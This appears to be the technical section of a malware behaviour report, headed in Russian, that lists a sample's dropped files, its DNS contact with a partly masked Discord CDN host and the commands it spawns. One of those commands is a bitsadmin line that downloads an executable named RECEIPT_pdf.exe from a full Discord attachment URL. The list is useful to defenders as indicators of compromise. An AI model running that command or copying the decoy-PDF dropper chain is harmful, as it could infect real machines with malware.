Техническая информация
- receipt_pdf.exe
- %APPDATA%\covid.bat
- %APPDATA%\covid.vbs
- %APPDATA%\dhl.pdf
- %TEMP%\bit3d9c.tmp
- %TEMP%\c40izvecuinalj
- %TEMP%\mjofvzkqrp.dll
- %TEMP%\bit3d9c.tmp
- %TEMP%\bit3d9c.tmp в %TEMP%\receipt_pdf.exe
- 'cd#.##scordapp.com':443
- 'cd#.##scordapp.com':443
- DNS ASK cd#.##scordapp.com
- ClassName: 'EDIT' WindowName: ''
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\covid.vbs"
- '%TEMP%\receipt_pdf.exe'
- '%WINDIR%\syswow64\cmd.exe' /c ""%APPDATA%\covid.bat" "' (со скрытым окном)
- '%ProgramFiles(x86)%\adobe\acrobat reader dc\reader\acrord32.exe' "%APPDATA%\DHL.pdf"
- '%WINDIR%\syswow64\cmd.exe' /c ""%APPDATA%\covid.bat" "
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer covid https://cdn.discordapp.com/attachments/842158048058540076/862582631030587403/RECEIPT_pdf.exe %TEMP%\RECEIPT_pdf.exe